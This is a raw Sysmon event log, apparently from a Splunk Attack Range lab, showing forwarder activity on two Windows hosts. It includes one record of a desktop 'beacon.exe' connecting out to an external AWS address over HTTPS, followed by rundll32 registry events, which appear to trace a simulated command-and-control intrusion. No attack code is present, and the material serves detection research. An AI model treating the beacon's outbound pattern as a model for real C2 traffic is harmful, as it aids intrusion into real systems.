Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA86D5F71CB4B87C4C9DA6E354632F7D,SHA256=E1275CB85D55D2988C895A593445BE2D333B8D69EAD83AC841D58660DC6770B8falsetrue 11241100x800000000000000057345872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:03.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:03.074{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA16D9BBD4C2FCD4EEF1C1A0443F2419,SHA256=059460F8F621CA9D65E48AAC3BE1C175307836A41A18B76099D598B57EF7A8A2falsetrue 23542300x800000000000000021219727Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:04.672{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C6D715D3D1454560D6FB565B3C15606,SHA256=527816EA67A79C7847B39F7850BE1AF38A661823F81FFE7403E730F991AF59F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:04.075{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:04.075{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1A27101FF1E5B1B37F0C7CC2E31C2D4,SHA256=5896ACA88FB50DFD527082874464C86E0424152B0D576E73196E2B8A67C295F6falsetrue 23542300x800000000000000021219728Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:05.688{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37FCA166BC6D8A5141F1BE6404F7C7EC,SHA256=13382C737D0E0AE900BDA74DF593421A92ACA6FB5A9E2FC55AEA9C2EDBC17BA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057345879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.928{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54556-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x800000000000000057345878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:05.093{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:05.093{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB10946B6C92AEE8E8AEB4B96BE12AB9,SHA256=9662ACDE32B62C93B1F5AB519DDE67E4839909ABA42B2D7B998A5E6DB436ECD6falsetrue 23542300x800000000000000021219729Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:06.688{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268909AEF9FF4E840E047AF5CEEEB2A4,SHA256=A58ADE32C4F6E3559232CFB3AD617F722FA21283145FC213829E4D411EB79E98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057345883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:06.142{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057345882Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:06.142{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x800000000000000057345881Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:06.110{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345880Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:06.110{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B351B166541C060D38A50A44CA102AF,SHA256=A10775B465216D4CE506808C85D7755B02909AF6EFC252FD32B492D31CA45E22falsetrue 354300x800000000000000021219734Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:54.485{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64333-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219733Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:07.706{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C3AABAC114DF6DCB2D651FEFFC4A226,SHA256=69396D5AC681A8A0FF6BD3C40A749FA555920B689999601E10A21DA821AD52B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057345943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.856{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057345932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057345910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057345908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057345907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057345906Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:07.840{8B6011A9-5B7F-618E-46F3-04000000F101}5676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 